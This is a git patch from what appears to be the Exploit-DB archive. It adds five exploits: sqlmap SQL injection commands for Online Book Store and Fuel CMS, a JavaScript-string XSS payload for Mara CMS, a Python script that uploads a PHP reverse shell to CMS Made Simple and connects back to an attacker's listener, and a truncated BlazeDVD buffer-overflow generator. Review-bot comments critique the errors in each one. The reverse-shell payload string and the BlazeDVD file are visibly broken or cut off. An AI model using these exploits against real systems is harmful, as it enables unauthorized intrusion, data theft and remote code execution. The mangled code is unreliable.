From d6bcc3b093410ca70b194b4e9b00cdac88ad212b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Tue, 1 Sep 2020 05:02:09 +0000
Subject: [PATCH] DB: 2020-09-01
5 changes to exploits/shellcodes
BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH_ASLR_DEP)
Online Book Store 1.0 - 'id' SQL Injection
Mara CMS 7.5 - Reflective Cross-Site Scripting
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
---
 exploits/php/webapps/48775.txt | 12 ++++
 exploits/php/webapps/48777.txt | 30 +++++++++
 exploits/php/webapps/48778.txt | 69 +++++++++++++++++++
 exploits/php/webapps/48779.py | 63 +++++++++++++++++
 exploits/windows/local/48776.py | 116 ++++++++++++++++++++++++++++++++
 files_exploits.csv | 5 ++
 6 files changed, 295 insertions(+)
 create mode 100644 exploits/php/webapps/48775.txt
 create mode 100644 exploits/php/webapps/48777.txt
 create mode 100644 exploits/php/webapps/48778.txt
 create mode 100755 exploits/php/webapps/48779.py
 create mode 100755 exploits/windows/local/48776.py
diff --git a/exploits/php/webapps/48775.txt b/exploits/php/webapps/48775.txt
new file mode 100644
index 000000000..928cb576f
--- /dev/null
+++ b/exploits/php/webapps/48775.txt
@@ -0,0 +1,12 @@
+# Title: Online Book Store 1.0 - 'id' SQL Injection
+# Exploit Author: Moaaz Taha (0xStorm)
+# Date: 2020-08-21
+# Vendor Homepage: https://www.sourcecodester.com/php/14383/online-book-store.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14383&title=Online+Book+Store
+# Version: 1.0
+# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4
+# Description
+This parameter "id" is vulnerable to Union-Based blind SQL injection in this path "/online%20book%20store/detail.php?id=44" that leads to retrieve all databases.
+
+#POC
+sqlmap -u "http://TARGET/online%20book%20store/detail.php?id=44" -p id --dbms=mysql --threads=10 --technique=U --dbs
\ No newline at end of file
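Review bot: The description on the `+This parameter "id"` line calls the issue a "Union-Based blind SQL injection", which is self-contradictory: a UNION-based injection returns the injected query's rows directly in the page, whereas a blind injection infers data through boolean or timing side channels, and the PoC's own `--technique=U` flag shows this is the former. I would change it to `This parameter "id" is vulnerable to UNION-based SQL injection in "/online%20book%20store/detail.php?id=44", allowing the full database contents to be retrieved.` The PoC also consists only of a sqlmap command; a single hand-built request (for example `detail.php?id=44'` showing the MySQL error, or a `UNION SELECT` with the matching column count) would let a reader confirm the flaw without pointing an automated scanner at a target.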
diff --git a/exploits/php/webapps/48777.txt b/exploits/php/webapps/48777.txt
new file mode 100644
index 000000000..df3b8bece
--- /dev/null
+++ b/exploits/php/webapps/48777.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Mara CMS 7.5 - Reflective Cross-Site Scripting
+# Google Dork: NA
+# Date: 2020-08-01
+# Exploit Author: George Tsimpidas
+# Vendor Homepage: https://sourceforge.net/projects/maracms/
+# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
+# Version: 7.5
+# Tested on: Kali Linux(x64)
+# CVE : CVE-2020-24223
+
+
+Mara CMS 7.5 suffers from a Reflected Cross Site Scripting vulnerability.
+
+Description :
+
+
+ This Reflected XSS vulnerability allows any authenticated user to
+inject malicious code via the parameter contact.php?theme=.
+The vulnerability exists because the parameter is not properly
+sanitized and this can lead to malicious code injection that will be
+executed on the target’s browser.
+
+PoC :
+
+Use Payload : seven69387';alert(1)//154
+
+Path : http://localhost/contact.php?theme=< inject payload here>
+
+Injection Example :
+http://localhost/contact.php?theme=seven69387';alert(1)//154
\ No newline at end of file
diff --git a/exploits/php/webapps/48778.txt b/exploits/php/webapps/48778.txt
new file mode 100644
index 000000000..67925e1e8
--- /dev/null
+++ b/exploits/php/webapps/48778.txt
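Review bot: The sentence `+ This Reflected XSS vulnerability allows any authenticated user to` mis-states the attack model: a reflected XSS is delivered through a crafted link and runs in the browser of whoever opens it, and nothing in the advisory shows that `contact.php` requires a login, so "authenticated" is an unsupported claim that should either be justified or replaced with `allows an attacker to inject script into the page served to a victim who opens a crafted URL`. The payload `seven69387';alert(1)//154` closes a single-quoted JavaScript string and comments out the remainder of the statement, which is worth stating explicitly (for example `the theme value is reflected inside a single-quoted JavaScript string without escaping`), since it explains why no HTML tags are needed and where the fix belongs. The title says "Reflective" while the body says "Reflected"; the latter is the standard term and the two should agree.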
@@ -0,0 +1,69 @@
+# Exploit Title: Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)
+# Date: 2020-08-19
+# Exploit Author: c0mpu7er(@ymbank.cn)
+# Vendor Homepage: https://www.getfuelcms.com/
+# Software Link: https://github.com/daylightstudio/FUEL-CMS/archive/1.4.8.zip
+# Version: 1.4.7
+# Tested on: PHP 5.4.45, Apache 2.4.23 ,mysql 5.0
+
+
+1. Description:
+----------------------
+
+FUEL CMS 1.4.8 allows SQL Injection via parameter 'fuel_replace_id' in pages/replace/1
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+2. Proof of Concept:
+----------------------
+
+In Burpsuite intercept the request from one of the affected pages with 'fuel_replace_id' parameter and save it like 33.txt
+Then run SQLmap to extract the data from the database:
+
+python sqlmap.py -r 33.txt --dbs
+
+3.Example payload:
+
+Content-Disposition: form-data; name="fuel_replace_id"
+
+11%27
+
+
+
+4. 
Burpsuite request payload:
+----------------------
+
+POST /FUEL-CMS-1.4.8/fuel/pages/replace/1?inline=1 HTTP/1.1
+Host: 192.168.1.12
+Content-Length: 347
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://192.168.1.12
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygI1zKZoBINTcL87g
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://192.168.1.12/FUEL-CMS-1.4.8/fuel/pages/replace/1?lang=english
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+Cookie: fuel_ac82b68172fd46789948eb8e66216180=a%3A2%3A%7Bs%3A2%3A%22id%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22language%22%3Bs%3A0%3A%22%22%3B%7D; fuel_ui_ac82b68172fd46789948eb8e66216180=%257B%2522leftnav_h3%2522%253A%25220%257C0%257C0%257C0%2522%252C%2522fuel_pages_items%2522%253A%2522list%2522%252C%2522tabs_pages_create%2522%253A%25220%2522%252C%2522fuel_navigation_items%2522%253A%2522list%2522%252C%2522tabs_navigation_create%2522%253A%25220%2522%252C%2522tabs_pages_edit_1%2522%253A%25220%2522%257D; ci_session=db8df72tccrt8vnr2uaqnckv5ak4n135
+Connection: close
+
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="fuel_replace_id"
+
+11*
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="Submit"
+
+Submit
+------WebKitFormBoundarygI1zKZoBINTcL87g
+Content-Disposition: form-data; name="fuel_inline"
+
+1
+------WebKitFormBoundarygI1zKZoBINTcL87g--
+5. Timeline:
+----------------------
+
+2020-08-20: SQLi vulnerability found in Fuel CMS 1.4.8
+2020-08-20: Reported vulnerability to vendor
+2020-08-22: Vendor has patched the SQLi vulnerability in version 1.4.9
\ No newline at end of file
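Review bot: `+# Version: 1.4.7` contradicts the title, the description and the timeline, which all name 1.4.8 (with the vendor fix in 1.4.9); it should read `# Version: 1.4.8`. The example payload `11%27` is presented inside a `multipart/form-data` body, but multipart fields are not percent-decoded, so `%27` would most likely arrive as the literal characters `%27` rather than a quote; the hand-test value should be shown as `11'`, with `11*` kept only as sqlmap's injection marker in the saved request. The captured request also carries the author's lab session cookies (`ci_session=…` and both `fuel_…` values); replacing them with placeholders such as `Cookie: <authenticated session cookies>` would stop readers pasting stale tokens into their own reproduction and keeps the advisory focused on the one parameter that matters.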
diff --git a/exploits/php/webapps/48779.py b/exploits/php/webapps/48779.py
new file mode 100755
index 000000000..8882c18cb
--- /dev/null
+++ b/exploits/php/webapps/48779.py
@@ -0,0 +1,63 @@
+#!/usr/bin/python3
+#-*- coding: utf-8 -*-
+
+# Exploit Title: CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)
+# Google Dork: N/A
+# Date: 2020-08-31
+# Exploit Author: Luis Noriega (@nogagmx)
+# Vendor Homepage: https://www.cmsmadesimple.org/
+# Software Link: http://s3.amazonaws.com/cmsms/downloads/14793/cmsms-2.2.14-install.zip
+# Version: 2.2.14
+# Tested on: Linux Ubuntu 18.04.4 LTS
+# CVE : N/A
+
+# Usage:
+# python3 exploit.py --url http://URL/cmsms/admin/login.php -u admin -p password -lhost LHOST -lport LPORT
+
+from urllib.parse import urlparse
+import requests
+import argparse
+import string
+import random
+import json
+import sys
+
+def parse_url(URL):
+ t = urlparse(URL)
+ return t.scheme+'://'+t.netloc+t.path.split('login.php')[0] + 'moduleinterface.php'
+
+
+parser = argparse.ArgumentParser(description='CMS Made Simple 2.2.14 - Authenticated Arbitrary File Upload - PHP Reverse Shell')
+parser.add_argument('--url', dest='URL', help='URL to admin pane ', required=True)
+parser.add_argument('-u', dest='USERNAME', help='Username', required=True)
+parser.add_argument('-p', dest='PASSWORD', help='Password', required=True)
+parser.add_argument('-lhost', dest='IP', help='The listen address', required=True)
+parser.add_argument('-lport', dest='PORT', help='The listen port', required=True)
+
+args = parser.parse_args()
+login_data = {'username':"", "password":"", "loginsubmit": "Submit"}
+PAYLOAD = ' array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Cannot spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell 
process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>'% (args.IP,args.PORT)
+FILENAME = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(5)) + '.phar'
+file = {'m1_files[]': (FILENAME, PAYLOAD)}
+upload_data = {"mact":"FileManager,m1_,upload,0", "__c":"", "disable_buffer":"1"}
+URL_UPLOAD = parse_url(args.URL)
+
+print("[ + ] Connection to the CMS Made Simple Admin Portal located at "+ args.URL)
+print("[ + ] Using "+ args.USERNAME +":"+ args.PASSWORD); login_data['username'] = args.USERNAME; login_data['password'] = args.PASSWORD
+
+try:
+ session = requests.session()
+ req = session.post(args.URL, data=login_data)
+ upload_data["__c"] = session.cookies["__c"]
+ print ("[ + ] %s logged successfully!"%(args.USERNAME))
+ response = requests.post(URL_UPLOAD, files=file, cookies=session.cookies,data=upload_data)
+ data = response.json()
+ print ("[ + ] %s file uploaded."%(FILENAME))
+ URL_TRIGGER = data[0]['url']
+ input("[ ! 
] Set up your nc listener , then press any to exploit.."%(args.PORT))
+ print ("[ + ] Pwned!!")
+ response = requests.get(URL_TRIGGER, cookies=session.cookies)
+ print ("[ + ] Bye")
+except:
+ print ("[ x ] Something went wrong, try again.")
+ sys.exit(1)
\ No newline at end of file
diff --git a/exploits/windows/local/48776.py b/exploits/windows/local/48776.py
new file mode 100755
index 000000000..1fefe532e
--- /dev/null
+++ b/exploits/windows/local/48776.py
@@ -0,0 +1,116 @@
+## Title: BlazeDVD 7.0 Professional - '.plf' Local Buffer Overflow (SEH,ASLR,DEP)
+## Author: emalp
+## Date: 2020-08-31
+## Vendor Homepage: http://www.blazevideo.com/
+## Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
+## Version: 7.0.0.0
+## Tested on: Windows 7 Home Basic
+
+# Run this file
+# bfile.plf will be generated
+# In blazeDVD open playlist and select bfile.plf
+# a pop up box will appear with text 'emalp'
+
+## Change shellcode according to your needs
+## Shellcode max size is aroung 700 bytes.
+
+# bad chars:
+# \x00, \x0a, \x0b, \x1a
+
+import struct
+
+bfile = open('bfile.plf','w')
+
+buf = 'A'*84
+buf += struct.pack('
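Review bot: The line `+ input("[ ! ] Set up your nc listener , then press any to exploit.."%(args.PORT))` has no `%` conversion in the format string, so applying `%` with the port string raises `TypeError: not all arguments converted during string formatting`; because this happens after the upload succeeds, the bare `except:` reports "Something went wrong" and the trigger GET is never sent, leaving the uploaded `.phar` on the server unexecuted. The fix is `input("[ ! ] Set up your nc listener on port %s, then press enter to exploit.." % args.PORT)`. The bare `except:` should also become `except Exception as e:` with `print("[ x ] Something went wrong: %s" % e)`, since it currently hides this and every other failure (a rejected login, a non-JSON upload response, a missing `url` key) behind the same message and additionally swallows `KeyboardInterrupt`. The `PAYLOAD` literal in this listing begins at `' array("pipe", "r"), …` with no `<?php` opener or socket setup, which looks like an artifact of how the page was rendered rather than the committed file, but is worth confirming against the repository before relying on the script.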